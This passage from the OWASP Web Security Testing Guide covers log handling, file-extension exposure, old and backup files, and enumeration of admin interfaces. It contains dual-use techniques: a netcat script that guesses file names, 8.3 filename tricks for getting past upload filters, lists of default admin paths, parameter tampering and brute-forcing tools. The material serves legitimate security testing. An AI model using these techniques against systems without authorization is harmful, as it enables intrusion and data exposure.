server vulnerabilities or misconfiguration (like the well-known server-status</p><p>misconfiguration in Apache-based HTTP servers).</p><p>Event logs will often contain data that is useful to an attacker (information leakage) or can be used directly in exploits:</p><p>Debug information</p><p>Stack traces</p><p>Usernames</p><p>System component names</p><p>Internal IP addresses</p><p>Less sensitive personal data (e.g. email addresses, postal addresses and telephone numbers associated with</p><p>named individuals)</p><p>Business data</p><p>Also, in some jurisdictions, storing some sensitive information in log files, such as personal data, might oblige the</p><p>enterprise to apply the data protection laws that they would apply to their back-end databases to log files too. And</p><p>failure to do so, even unknowingly, might carry penalties under the data protection laws that apply.</p><p>A wider list of sensitive information is:</p><p>Application source code</p><p>Session identification values</p><p>Access tokens</p><p>Sensitive personal data and some forms of personally identifiable information (PII)</p><p>Authentication passwords</p><p>Database connection strings</p><p>Encryption keys</p><p>Bank account or payment card holder data</p><p>Data of a higher security classification than the logging system is allowed to store</p><p>Commercially-sensitive information</p><p>Information it is illegal to collect in the relevant jurisdiction</p><p>Information a user has opted out of collection, or not consented to e.g. use of do not track, or where consent to</p><p>collect has expired</p><p>Log Location</p><p>Web Security Testing Guide v4.1</p><p>96</p><p>Typically servers will generate local logs of their actions and errors, consuming the disk of the system the server is</p><p>running on. However, if the server is compromised its logs can be wiped out by the intruder to clean up all the traces of</p><p>its attack and methods. If this were to happen the system administrator would have no knowledge of how the attack</p><p>occurred or where the attack source was located. Actually, most attacker tool kits include a ‘’log zapper ‘’ that is capable</p><p>of cleaning up any logs that hold given information (like the IP address of the attacker) and are routinely used in</p><p>attacker’s system-level root kits.</p><p>Consequently, it is wiser to keep logs in a separate location and not in the web server itself. This also makes it easier to</p><p>aggregate logs from different sources that refer to the same application (such as those of a web server farm) and it also</p><p>makes it easier to do log analysis (which can be CPU intensive) without affecting the server itself.</p><p>Log Storage</p><p>Logs can introduce a Denial of Service condition if they are not properly stored. Any attacker with sufficient resources</p><p>could be able to produce a sufficient number of requests that would fill up the allocated space to log files, if they are not</p><p>specifically prevented from doing so. However, if the server is not properly configured, the log files will be stored in the</p><p>same disk partition as the one used for the operating system software or the application itself. This means that if the</p><p>disk were to be filled up the operating system or the application might fail because it is unable to write on disk.</p><p>Typically in UNIX systems logs will be located in /var (although some server installations might reside in /opt or</p><p>/usr/local) and it is important to make sure that the directories in which logs are stored are in a separate partition. In</p><p>some cases, and in order to prevent the system logs from being affected, the log directory of the server software itself</p><p>(such as /var/log/apache in the Apache web server) should be stored in a dedicated partition.</p><p>This is not to say that logs should be allowed to grow to fill up the file system they reside in. Growth of server logs</p><p>should be monitored in order to detect this condition since it may be indicative of an attack.</p><p>Testing this condition is as easy, and as dangerous in production environments, as firing off a sufficient and sustained</p><p>number of requests to see if these requests are logged and if there is a possibility to fill up the log partition through</p><p>these requests. In some environments where QUERY_STRING parameters are also logged regardless of whether they</p><p>are produced through GET or POST requests, big queries can be simulated that will fill up the logs faster since,</p><p>typically, a single</p><p>request will cause only a small amount of data to be logged, such as date and time, source IP</p><p>address, URI request, and server result.</p><p>Log Rotation</p><p>Most servers (but few custom applications) will rotate logs in order to prevent them from filling up the file system they</p><p>reside on. The assumption when rotating logs is that the information in them is only necessary for a limited amount of</p><p>time.</p><p>This feature should be tested in order to ensure that:</p><p>Logs are kept for the time defined in the security policy, not more and not less.</p><p>Logs are compressed once rotated (this is a convenience, since it will mean that more logs will be stored for the</p><p>same available disk space).</p><p>File system permission of rotated log files are the same (or stricter) that those of the log files itself. For example,</p><p>web servers will need to write to the logs they use but they don’t actually need to write to rotated logs, which means</p><p>that the permissions of the files can be changed upon rotation to prevent the web server process from modifying</p><p>these.</p><p>Some servers might rotate logs when they reach a given size. If this happens, it must be ensured that an attacker</p><p>cannot force logs to rotate in order to hide his tracks.</p><p>Log Access Control</p><p>Event log information should never be visible to end users. Even web administrators should not be able to see such</p><p>logs since it breaks separation of duty controls. Ensure that any access control schema that is used to protect access to</p><p>Web Security Testing Guide v4.1</p><p>97</p><p>raw logs and any applications providing capabilities to view or search the logs is not linked with access control</p><p>schemas for other application user roles. Neither should any log data be viewable by unauthenticated users.</p><p>Log Review</p><p>Review of logs can be used for more than extraction of usage statistics of files in the web servers (which is typically</p><p>what most log-based application will focus on), but also to determine if attacks take place at the web server.</p><p>In order to analyze web server attacks the error log files of the server need to be analyzed. Review should concentrate</p><p>on:</p><p>40x (not found) error messages. A large amount of these from the same source might be indicative of a CGI</p><p>scanner tool being used against the web server</p><p>50x (server error) messages. These can be an indication of an attacker abusing parts of the application which fail</p><p>unexpectedly. For example, the first phases of a SQL injection attack will produce these error message when the</p><p>SQL query is not properly constructed and its execution fails on the back end database.</p><p>Log statistics or analysis should not be generated, nor stored, in the same server that produces the logs. Otherwise, an</p><p>attacker might, through a web server vulnerability or improper configuration, gain access to them and retrieve similar</p><p>information as would be disclosed by log files themselves.</p><p>References</p><p>Apache</p><p>Apache Security, by Ivan Ristic, O’reilly, March 2005.</p><p>Apache Security Secrets: Revealed (Again), Mark Cox, November 2003</p><p>Apache Security Secrets: Revealed, ApacheCon 2002, Las Vegas, Mark J Cox, October 2002</p><p>Performance Tuning</p><p>Lotus Domino</p><p>Lotus Security Handbook, William Tworek et al., April 2004, available in the IBM Redbooks collection</p><p>Lotus Domino Security, an X-force white-paper, Internet Security Systems, December 2002</p><p>Hackproofing Lotus Domino Web Server, David Litchfield, October 2001</p><p>Microsoft IIS</p><p>Security Best Practices for IIS 8</p><p>CIS Microsoft IIS Benchmarks</p><p>Securing Your Web Server (Patterns and Practices), Microsoft Corporation, January 2004</p><p>IIS Security and Programming Countermeasures, by Jason Coombs</p><p>From Blueprint to Fortress: A Guide to Securing IIS 5.0, by John Davis, Microsoft Corporation, June 2001</p><p>Secure Internet Information Services 5 Checklist, by Michael Howard, Microsoft Corporation, June 2000</p><p>Red Hat’s (formerly Netscape’s) iPlanet</p><p>Guide to the Secure Configuration and Administration of iPlanet Web Server, Enterprise Edition 4.1, by James</p><p>M Hayes, The Network Applications Team of the Systems and Network Attack Center (SNAC), NSA, January</p><p>2001</p><p>WebSphere</p><p>IBM WebSphere V5.0 Security, WebSphere Handbook Series, by Peter Kovari et al., IBM, December 2002.</p><p>IBM WebSphere V4.0 Advanced Edition Security, by Peter Kovari et al., IBM, March 2002.</p><p>https://awe.com/mark/talks/apachecon2003us.html</p><p>https://awe.com/mark/talks/apachecon2002us.html</p><p>https://httpd.apache.org/docs/current/misc/perf-tuning.html</p><p>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/jj635855(v=ws.11)</p><p>https://www.cisecurity.org/benchmark/microsoft_iis/</p><p>Web Security Testing Guide v4.1</p><p>98</p><p>General</p><p>Logging Cheat Sheet, OWASP</p><p>SP 800-92 Guide to Computer Security Log Management, NIST</p><p>PCI DSS v3.1 Requirement 10 and PA-DSS v2.0 Requirement 4, PCI Security Standards Council</p><p>Generic:</p><p>CERT Security Improvement Modules: Securing Public Web Servers</p><p>How To: Use IISLockdown.exe</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html</p><p>https://csrc.nist.gov/publications/detail/sp/800-92/final</p><p>https://www.pcisecuritystandards.org/document_library</p><p>https://resources.sei.cmu.edu/asset_files/SecurityImprovementModule/2000_006_001_13637.pdf</p><p>https://support.microsoft.com/en-us/help/325864/how-to-install-and-use-the-iis-lockdown-wizard</p><p>Web Security Testing Guide v4.1</p><p>99</p><p>Test File Extensions Handling for Sensitive Information</p><p>ID</p><p>WSTG-CONF-03</p><p>Summary</p><p>File extensions are commonly used in web servers to easily determine which technologies, languages and plugins</p><p>must be used to fulfill the web request. While this behavior is consistent with RFCs and Web Standards, using standard</p><p>file extensions provides the penetration tester useful information about the underlying technologies used in a web</p><p>appliance and greatly simplifies the task of determining the attack scenario to be used on particular technologies. In</p><p>addition, mis-configuration of web servers could easily reveal confidential information about access credentials.</p><p>Extension checking is often used to validate files to be uploaded, which can lead to unexpected results because the</p><p>content is not what is expected, or because of unexpected OS file name handling.</p><p>Determining how web servers handle requests corresponding to files having different extensions may help in</p><p>understanding web server behavior depending on the kind of files that are accessed. For example, it can help to</p><p>understand which file extensions are returned as text or plain versus those that cause execution on the server side. The</p><p>latter are indicative of technologies, languages or plugins that are used by web servers or application servers, and may</p><p>provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually</p><p>associated with server-side Perl support. However, the file extension alone may be deceptive and not fully conclusive.</p><p>For example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related. See</p><p>the next section on “web server components” for more on identifying server side technologies and components.</p><p>How to Test</p><p>Forced Browsing</p><p>Submit requests with different file extensions and verify how they are handled. The verification should be on a per web</p><p>directory basis. Verify directories that allow script execution. Web server directories can be identified by scanning tools</p><p>which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to</p><p>reconstruct the tree of web directories served by the application.</p><p>If the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not</p><p>be easy, depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components</p><p>there may be slight variations in the configuration of individual web or application servers. This may happen if the web</p><p>architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing</p><p>configuration, which may introduce slight asymmetric behavior between them, and possibly different vulnerabilities).</p><p>Example</p><p>The tester has identified the existence of a file named connection.inc . Trying to access it directly gives back its</p><p>contents, which are:</p><p><?</p><p>mysql_connect("127.0.0.1", "root", "password")</p><p>or die("Could not connect");</p><p>?></p><p>The tester determines the existence of a MySQL DBMS back end, and the (weak) credentials used by the web</p><p>application to access it.</p><p>Web Security Testing Guide v4.1</p><p>100</p><p>The following file extensions should never be returned by a web server, since they are related to files which may</p><p>contain sensitive information or to files for which there is no reason to be served.</p><p>.asa</p><p>.inc</p><p>.config</p><p>The following file extensions are related to files which, when accessed, are either displayed or downloaded by the</p><p>browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served</p><p>(and are not leftovers), and that they do not contain sensitive information.</p><p>.zip, .tar, .gz, .tgz, .rar, …: (Compressed) archive files</p><p>.java: No reason to provide access to Java source files</p><p>.txt: Text files</p><p>.pdf: PDF documents</p><p>.doc, .rtf, .xls, .ppt, …: Office documents</p><p>.bak, .old and other extensions indicative of backup files (for example: ~ for Emacs backup files)</p><p>The list given above details only a few examples, since file extensions are too many to be comprehensively treated</p><p>here. Refer to https://filext.com for a more thorough database of extensions.</p><p>To identify files having a given extensions a mix of techniques can be employed. THese techniques can include</p><p>Vulnerability Scanners, spidering and mirroring tools, manually inspecting the application (this overcomes limitations in</p><p>automatic spidering), querying search engines (see Testing: Spidering and googling). See also Testing for Old, Backup</p><p>and Unreferenced Files which deals with the security issues related to “forgotten” files.</p><p>File Upload</p><p>Windows 8.3 legacy file handling can sometimes be used to defeat file upload filters</p><p>Usage Examples:</p><p>file.phtml gets processed as PHP code</p><p>FILE~1.PHT is served, but not processed by the PHP ISAPI handler</p><p>shell.phPWND can be uploaded</p><p>SHELL~1.PHP will be expanded and returned by the OS shell, then processed by the PHP ISAPI handler</p><p>Gray-Box Testing</p><p>Performing white-box testing against file extensions handling amounts to checking the configurations of web servers or</p><p>application servers taking part in the web application architecture, and verifying how they are instructed to serve</p><p>different file extensions.</p><p>If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce</p><p>different behavior.</p><p>Tools</p><p>Vulnerability scanners, such as Nessus and Nikto check for the existence of well-known web directories. They may</p><p>allow the tester to download the web site structure, which is helpful when trying to determine the configuration of web</p><p>directories and how individual file extensions are served. Other tools that can be used for this purpose include:</p><p>wget</p><p>https://filext.com/</p><p>https://www.gnu.org/software/wget</p><p>Web Security Testing Guide v4.1</p><p>101</p><p>curl</p><p>google for “web mirroring tools”.</p><p>https://curl.haxx.se/</p><p>Web Security Testing Guide v4.1</p><p>102</p><p>Review Old Backup and Unreferenced Files for Sensitive</p><p>Information</p><p>ID</p><p>WSTG-CONF-04</p><p>Summary</p><p>While most of the files within a web server are directly handled by the server itself, it isn’t uncommon to find</p><p>unreferenced or forgotten files that can be used to obtain important information about the infrastructure or the</p><p>credentials.</p><p>Most common scenarios include the presence of renamed old versions of modified files, inclusion files that are loaded</p><p>into the language of choice and can be downloaded as source, or even automatic or manual backups in form of</p><p>compressed archives. Backup files can also be generated automatically by the underlying file system the application is</p><p>hosted on, a feature usually referred to as “snapshots”.</p><p>All these files may grant the tester access to inner workings, back doors, administrative interfaces, or even credentials</p><p>to connect to the administrative interface or the database server.</p><p>An important source of vulnerability lies in files which have nothing to do with the application, but are created as a</p><p>consequence of editing application files, or after creating on-the-fly backup copies, or by leaving in the web tree old</p><p>files or unreferenced files.Performing in-place editing or other administrative actions on production web servers may</p><p>inadvertently leave backup copies, either generated automatically by the editor while editing files, or by the</p><p>administrator who is zipping a set of files to create a backup.</p><p>It is easy to forget such files and this may pose a serious security threat to the application. That happens because</p><p>backup copies may be generated with file extensions differing from those of the original files. A .tar , .zip or .gz</p><p>archive that we generate (and forget…) has obviously a different extension, and the same happens with automatic</p><p>copies created by many editors (for example, emacs generates a backup copy named file~ when editing file ).</p><p>Making a copy by hand may produce the same effect (think of copying file to file.old ). The underlying file system</p><p>the application is on could be making snapshots of your application at different points in time without your knowledge,</p><p>which may also be accessible via the web, posing a similar but different backup file style threat to your application.</p><p>As a result, these activities generate files that are not needed by the application and may be handled differently than</p><p>the original file by the web server. For example, if we make a copy of login.asp named login.asp.old , we are</p><p>allowing users to download the source code of login.asp . This is because login.asp.old will be typically served as</p><p>text or plain, rather than being executed because of its extension. In other words, accessing login.asp causes the</p><p>execution of the server-side code of login.asp , while accessing login.asp.old causes the content of</p><p>login.asp.old (which is, again, server-side code) to be plainly returned to the user and displayed in the browser. This</p><p>may pose security risks, since sensitive information may be revealed.</p><p>Generally, exposing server side code is a bad idea. Not only are you unnecessarily exposing business logic, but you</p><p>may be unknowingly revealing application-related information which may help an attacker (path names, data</p><p>structures, etc.). Not to mention the fact that there are too many scripts with embedded username and password in clear</p><p>text (which is a careless and very dangerous practice).</p><p>Other causes of unreferenced files are due to design or configuration choices when they allow diverse kind of</p><p>application-related files such as data files, configuration files, log files, to be stored in file system directories that can be</p><p>accessed by the web server. These files have normally no reason to be in a file system space that could be accessed</p><p>via web, since they should be accessed only at the application level, by the application itself (and not by the casual</p><p>user browsing around).</p><p>Web Security Testing Guide v4.1</p><p>103</p><p>Threats</p><p>Old, backup and unreferenced files present various threats to the security of a web application:</p><p>Unreferenced files may disclose sensitive information that can facilitate a focused attack against the application; for</p><p>example include files containing database credentials, configuration files containing references to other hidden</p><p>content, absolute file paths, etc.</p><p>Unreferenced pages may contain powerful functionality that can be used to attack the application; for example an</p><p>administration page that is not linked from published content but can be accessed by any user who knows where</p><p>to find it.</p><p>Old and backup files may contain vulnerabilities that have been fixed in more recent versions; for example</p><p>viewdoc.old.jsp may contain</p><p>a directory traversal vulnerability that has been fixed in viewdoc.jsp but can still</p><p>be exploited by anyone who finds the old version.</p><p>Backup files may disclose the source code for pages designed to execute on the server; for example requesting</p><p>viewdoc.bak may return the source code for viewdoc.jsp , which can be reviewed for vulnerabilities that may be</p><p>difficult to find by making blind requests to the executable page. While this threat obviously applies to scripted</p><p>languages, such as Perl, PHP, ASP, shell scripts, JSP, etc., it is not limited to them, as shown in the example</p><p>provided in the next bullet.</p><p>Backup archives may contain copies of all files within (or even outside) the webroot. This allows an attacker to</p><p>quickly enumerate the entire application, including unreferenced pages, source code, include files, etc. For</p><p>example, if you forget a file named myservlets.jar.old file containing (a backup copy of) your servlet</p><p>implementation classes, you are exposing a lot of sensitive information which is susceptible to decompilation and</p><p>reverse engineering.</p><p>In some cases copying or editing a file does not modify the file extension, but modifies the file name. This happens</p><p>for example in Windows environments, where file copying operations generate file names prefixed with “Copy of “</p><p>or localized versions of this string. Since the file extension is left unchanged, this is not a case where an</p><p>executable file is returned as plain text by the web server, and therefore not a case of source code disclosure.</p><p>However, these files too are dangerous because there is a chance that they include obsolete and incorrect logic</p><p>that, when invoked, could trigger application errors, which might yield valuable information to an attacker, if</p><p>diagnostic message display is enabled.</p><p>Log files may contain sensitive information about the activities of application users, for example sensitive data</p><p>passed in URL parameters, session IDs, URLs visited (which may disclose additional unreferenced content), etc.</p><p>Other log files (e.g. ftp logs) may contain sensitive information about the maintenance of the application by system</p><p>administrators.</p><p>File system snapshots may contain copies of the code that contain vulnerabilities that have been fixed in more</p><p>recent versions. For example /.snapshot/monthly.1/view.php may contain a directory traversal vulnerability that</p><p>has been fixed in /view.php but can still be exploited by anyone who finds the old version.</p><p>How to Test</p><p>Black-Box Testing</p><p>Testing for unreferenced files uses both automated and manual techniques, and typically involves a combination of the</p><p>following:</p><p>Inference from the Naming Scheme Used for Published Content</p><p>Enumerate all of the application’s pages and functionality. This can be done manually using a browser, or using an</p><p>application spidering tool. Most applications use a recognizable naming scheme, and organize resources into pages</p><p>and directories using words that describe their function. From the naming scheme used for published content, it is often</p><p>possible to infer the name and location of unreferenced pages. For example, if a page viewuser.asp is found, then</p><p>look also for edituser.asp , adduser.asp and deleteuser.asp . If a directory /app/user is found, then look also for</p><p>/app/admin and /app/manager .</p><p>Other Clues in Published Content</p><p>Many web applications leave clues in published content that can lead to the discovery of hidden pages and</p><p>functionality. These clues often appear in the source code of HTML and JavaScript files. The source code for all</p><p>Web Security Testing Guide v4.1</p><p>104</p><p>published content should be manually reviewed to identify clues about other pages and functionality. For example:</p><p>Programmers’ comments and commented-out sections of source code may refer to hidden content:</p><p><!-- <A HREF="uploadfile.jsp">Upload a document to the server</A> --></p><p><!-- Link removed while bugs in uploadfile.jsp are fixed --></p><p>JavaScript may contain page links that are only rendered within the user’s GUI under certain circumstances:</p><p>var adminUser=false;</p><p>if (adminUser) menu.add (new menuItem ("Maintain users", "/admin/useradmin.jsp"));</p><p>HTML pages may contain FORMs that have been hidden by disabling the SUBMIT element:</p><p><FORM action="forgotPassword.jsp" method="post"></p><p><INPUT type="hidden" name="userID" value="123"></p><p><!-- <INPUT type="submit" value="Forgot Password"> --></p><p></FORM></p><p>Another source of clues about unreferenced directories is the /robots.txt file used to provide instructions to web</p><p>robots:</p><p>User-agent: *</p><p>Disallow: /Admin</p><p>Disallow: /uploads</p><p>Disallow: /backup</p><p>Disallow: /~jbloggs</p><p>Disallow: /include</p><p>Blind Guessing</p><p>In its simplest form, this involves running a list of common file names through a request engine in an attempt to guess</p><p>files and directories that exist on the server. The following netcat wrapper script will read a wordlist from stdin and</p><p>perform a basic guessing attack:</p><p>#!/bin/bash</p><p>server=example.org</p><p>port=80</p><p>while read url</p><p>do</p><p>echo -ne "$url\t"</p><p>echo -e "GET /$url HTTP/1.0\nHost: $server\n" | netcat $server $port | head -1</p><p>done | tee outputfile</p><p>Depending upon the server, GET may be replaced with HEAD for faster results. The output file specified can be</p><p>grepped for “interesting” response codes. The response code 200 (OK) usually indicates that a valid resource has</p><p>been found (provided the server does not deliver a custom “not found” page using the 200 code). But also look out for</p><p>301 (Moved), 302 (Found), 401 (Unauthorized), 403 (Forbidden) and 500 (Internal error), which may also indicate</p><p>resources or directories that are worthy of further investigation.</p><p>Web Security Testing Guide v4.1</p><p>105</p><p>The basic guessing attack should be run against the webroot, and also against all directories that have been identified</p><p>through other enumeration techniques. More advanced/effective guessing attacks can be performed as follows:</p><p>Identify the file extensions in use within known areas of the application (e.g. jsp, aspx, html), and use a basic</p><p>wordlist appended with each of these extensions (or use a longer list of common extensions if resources permit).</p><p>For each file identified through other enumeration techniques, create a custom wordlist derived from that filename.</p><p>Get a list of common file extensions (including ~, bak, txt, src, dev, old, inc, orig, copy, tmp, swp, etc.) and use each</p><p>extension before, after, and instead of, the extension of the actual file name.</p><p>Note: Windows file copying operations generate file names prefixed with “Copy of “ or localized versions of this string,</p><p>hence they do not change file extensions. While “Copy of ” files typically do not disclose source code when accessed,</p><p>they might yield valuable information in case they cause errors when invoked.</p><p>Information Obtained Through Server Vulnerabilities and Misconfiguration</p><p>The most obvious way in which a misconfigured server may disclose unreferenced pages is through directory listing.</p><p>Request all enumerated directories to identify any which provide a directory listing.</p><p>Numerous vulnerabilities have been found in individual web servers which allow an attacker to enumerate</p><p>unreferenced content, for example:</p><p>Apache ?M=D directory listing vulnerability.</p><p>Various IIS script source disclosure vulnerabilities.</p><p>IIS WebDAV directory listing vulnerabilities.</p><p>Use of Publicly Available Information</p><p>Pages and functionality in Internet-facing web applications that are not referenced from within the application itself may</p><p>be referenced from other public domain sources. There are various sources of these references:</p><p>Pages that used to be referenced may still appear in the archives of Internet search engines. For example,</p><p>1998results.asp may no longer be linked from a company’s website, but may remain on the server and in search</p><p>engine databases. This old script may contain vulnerabilities that could be used to compromise the entire site. The</p><p>site: Google search operator may be used to run a query only against the domain of choice, such as in:</p><p>site:www.example.com</p><p>. Using search engines in this way has lead to a broad array of techniques which you may</p><p>find useful and that are described in the Google Hacking section of this Guide. Check it to hone your testing skills</p><p>via Google. Backup files are not likely to be referenced by any other files and therefore may have not been indexed</p><p>by Google, but if they lie in browsable directories the search engine might know about them.</p><p>In addition, Google and Yahoo keep cached versions of pages found by their robots. Even if 1998results.asp has</p><p>been removed from the target server, a version of its output may still be stored by these search engines. The</p><p>cached version may contain references to, or clues about, additional hidden content that still remains on the server.</p><p>Content that is not referenced from within a target application may be linked to by third-party websites. For</p><p>example, an application which processes online payments on behalf of third-party traders may contain a variety of</p><p>bespoke functionality which can (normally) only be found by following links within the web sites of its customers.</p><p>File Name Filter Bypass</p><p>Because blacklist filters are based on regular expressions, one can sometimes take advantage of obscure OS file</p><p>name expansion features in which work in ways the developer didn’t expect. The tester can sometimes exploit</p><p>differences in ways that file names are parsed by the application, web server, and underlying OS and it’s file name</p><p>conventions.</p><p>Example: Windows 8.3 filename expansion c:\\program files becomes C:\\PROGRA\~1</p><p>Remove incompatible characters</p><p>Convert spaces to underscores</p><p>Take the first six characters of the basename</p><p>Web Security Testing Guide v4.1</p><p>106</p><p>Add ~<digit> which is used to distinguish files with names using the same six initial characters</p><p>This convention changes after the first 3 cname ollisions</p><p>Truncate file extension to three characters</p><p>Make all the characters uppercase</p><p>Gray-Box Testing</p><p>Performing gray box testing against old and backup files requires examining the files contained in the directories</p><p>belonging to the set of web directories served by the web server(s) of the web application infrastructure. Theoretically</p><p>the examination should be performed by hand to be thorough. However, since in most cases copies of files or backup</p><p>files tend to be created by using the same naming conventions, the search can be easily scripted. For example, editors</p><p>leave behind backup copies by naming them with a recognizable extension or ending and humans tend to leave</p><p>behind files with a .old or similar predictable extensions. A good strategy is that of periodically scheduling a</p><p>background job checking for files with extensions likely to identify them as copy or backup files, and performing manual</p><p>checks as well on a longer time basis.</p><p>Tools</p><p>Vulnerability assessment tools tend to include checks to spot web directories having standard names (such as “admin”,</p><p>“test”, “backup”, etc.), and to report any web directory which allows indexing. If you can’t get any directory listing, you</p><p>should try to check for likely backup extensions. Check for example</p><p>Nessus</p><p>Nikto2</p><p>Web spider tools</p><p>wget</p><p>Wget for Windows</p><p>Sam Spade</p><p>Spike proxy includes a web site crawler function</p><p>Xenu</p><p>curl</p><p>Some of them are also included in standard Linux distributions. Web development tools usually include facilities to</p><p>identify broken links and unreferenced files.</p><p>Remediation</p><p>To guarantee an effective protection strategy, testing should be compounded by a security policy which clearly forbids</p><p>dangerous practices, such as:</p><p>Editing files in-place on the web server or application server file systems. This is a particular bad habit, since it is</p><p>likely to unwillingly generate backup files by the editors. It is amazing to see how often this is done, even in large</p><p>organizations. If you absolutely need to edit files on a production system, do ensure that you don’t leave behind</p><p>anything which is not explicitly intended, and consider that you are doing it at your own risk.</p><p>Check carefully any other activity performed on file systems exposed by the web server, such as spot</p><p>administration activities. For example, if you occasionally need to take a snapshot of a couple of directories (which</p><p>you should not do on a production system), you may be tempted to zip them first. Be careful not to forget behind</p><p>those archive files.</p><p>Appropriate configuration management policies should help not to leave around obsolete and unreferenced files.</p><p>Applications should be designed not to create (or rely on) files stored under the web directory trees served by the</p><p>web server. Data files, log files, configuration files, etc. should be stored in directories not accessible by the web</p><p>server, to counter the possibility of information disclosure (not to mention data modification if web directory</p><p>permissions allow writing).</p><p>https://www.tenable.com/products/nessus</p><p>https://cirt.net/Nikto2</p><p>https://www.gnu.org/software/wget/</p><p>http://www.interlog.com/~tcharron/wgetwin.html</p><p>https://web.archive.org/web/20090926061558/http://preview.samspade.org/ssw/download.html</p><p>https://www.spikeproxy.com/</p><p>http://home.snafu.de/tilman/xenulink.html</p><p>https://curl.haxx.se/</p><p>Web Security Testing Guide v4.1</p><p>107</p><p>File system snapshots should not be accessible via the web if the document root is on a file system using this</p><p>technology. Configure your web server to deny access to such directories, for example under apache a location</p><p>directive such this should be used:</p><p><Location ~ ".snapshot"></p><p>Order deny,allow</p><p>Deny from all</p><p></Location></p><p>Web Security Testing Guide v4.1</p><p>108</p><p>Enumerate Infrastructure and Application Admin Interfaces</p><p>ID</p><p>WSTG-CONF-05</p><p>Summary</p><p>Administrator interfaces may be present in the application or on the application server to allow certain users to</p><p>undertake privileged activities on the site. Tests should be undertaken to reveal if and how this privileged functionality</p><p>can be accessed by an unauthorized or standard user.</p><p>An application may require an administrator interface to enable a privileged user to access functionality that may make</p><p>changes to how the site functions. Such changes may include:</p><p>user account provisioning</p><p>site design and layout</p><p>data manipulation</p><p>configuration changes</p><p>In many instances, such interfaces do not have sufficient controls to protect them from unauthorized access. Testing is</p><p>aimed at discovering these administrator interfaces and accessing functionality intended for the privileged users.</p><p>How to Test</p><p>Black-Box Testing</p><p>The following section describes vectors that may be used to test for the presence of administrative interfaces. These</p><p>techniques may also be used to test for related issues including privilege escalation, and are described elsewhere in</p><p>this guide(for example Testing for bypassing authorization schema and Testing for Insecure Direct Object References in</p><p>greater detail.</p><p>Directory and file enumeration. An administrative interface may be present but not visibly available to the tester.</p><p>Attempting to guess the path of the administrative interface may be as simple as requesting: /admin or</p><p>/administrator etc.. or in some scenarios can be revealed within seconds using Google dorks.</p><p>There are many tools available to perform brute forcing of server contents, see the tools section below for more</p><p>information. A tester may have to also identify the file name of the administration page. Forcibly browsing to the</p><p>identified page may provide access to the interface.</p><p>Comments and links in source code. Many sites use common code that is loaded for all site users. By examining</p><p>all source sent to the client, links to administrator functionality may be discovered and should be investigated.</p><p>Reviewing server and application documentation. If the application server or application is deployed in its default</p><p>configuration it may be possible to access the administration interface using information described in configuration</p><p>or help documentation. Default password lists should be consulted if an administrative interface is found</p><p>and</p><p>credentials are required.</p><p>Publicly available information. Many applications such as wordpress have default administrative interfaces .</p><p>Alternative server port. Administration interfaces may be seen on a different port on the host than the main</p><p>application. For example, Apache Tomcat’s Administration interface can often be seen on port 8080.</p><p>Parameter tampering. A GET or POST parameter or a cookie variable may be required to enable the administrator</p><p>functionality. Clues to this include the presence of hidden fields such as:</p><p><input type="hidden" name="admin" value="no"></p><p>https://www.exploit-db.com/google-hacking-database</p><p>Web Security Testing Guide v4.1</p><p>109</p><p>or in a cookie:</p><p>Cookie: session_cookie; useradmin=0</p><p>Once an administrative interface has been discovered, a combination of the above techniques may be used to attempt</p><p>to bypass authentication. If this fails, the tester may wish to attempt a brute force attack. In such an instance the tester</p><p>should be aware of the potential for administrative account lockout if such functionality is present.</p><p>Gray-Box Testing</p><p>A more detailed examination of the server and application components should be undertaken to ensure hardening (i.e.</p><p>administrator pages are not accessible to everyone through the use of IP filtering or other controls), and where</p><p>applicable, verification that all components do not use default credentials or configurations. Source code should be</p><p>reviewed to ensure that the authorization and authentication model ensures clear separation of duties between normal</p><p>users and site administrators. User interface functions shared between normal and administrator users should be</p><p>reviewed to ensure clear separation between the drawing of such components and information leakage from such</p><p>shared functionality.</p><p>Each web framework may have its own admin default pages or path. For example</p><p>WebSphere:</p><p>/admin</p><p>/admin-authz.xml</p><p>/admin.conf</p><p>/admin.passwd</p><p>/admin/*</p><p>/admin/logon.jsp</p><p>/admin/secure/logon.jsp</p><p>PHP:</p><p>/phpinfo</p><p>/phpmyadmin/</p><p>/phpMyAdmin/</p><p>/mysqladmin/</p><p>/MySQLadmin</p><p>/MySQLAdmin</p><p>/login.php</p><p>/logon.php</p><p>/xmlrpc.php</p><p>/dbadmin</p><p>FrontPage:</p><p>/admin.dll</p><p>/admin.exe</p><p>/administrators.pwd</p><p>/author.dll</p><p>/author.exe</p><p>/author.log</p><p>/authors.pwd</p><p>/cgi-bin</p><p>WebLogic:</p><p>Web Security Testing Guide v4.1</p><p>110</p><p>/AdminCaptureRootCA</p><p>/AdminClients</p><p>/AdminConnections</p><p>/AdminEvents</p><p>/AdminJDBC</p><p>/AdminLicense</p><p>/AdminMain</p><p>/AdminProps</p><p>/AdminRealm</p><p>/AdminThreads</p><p>WordPress:</p><p>wp-admin/</p><p>wp-admin/about.php</p><p>wp-admin/admin-ajax.php</p><p>wp-admin/admin-db.php</p><p>wp-admin/admin-footer.php</p><p>wp-admin/admin-functions.php</p><p>wp-admin/admin-header.php</p><p>Tools</p><p>OWASP ZAP - Forced Browse is a currently maintained use of OWASP’s previous DirBuster project.</p><p>THC-HYDRA is a tool that allows brute-forcing of many interfaces, including form-based HTTP authentication.</p><p>A brute forcer is much better when it uses a good dictionary, for example the netsparker dictionary.</p><p>References</p><p>Default Password list</p><p>Default Password list</p><p>FuzzDB can be used to do brute force browsing admin login path</p><p>Common admin or debugging 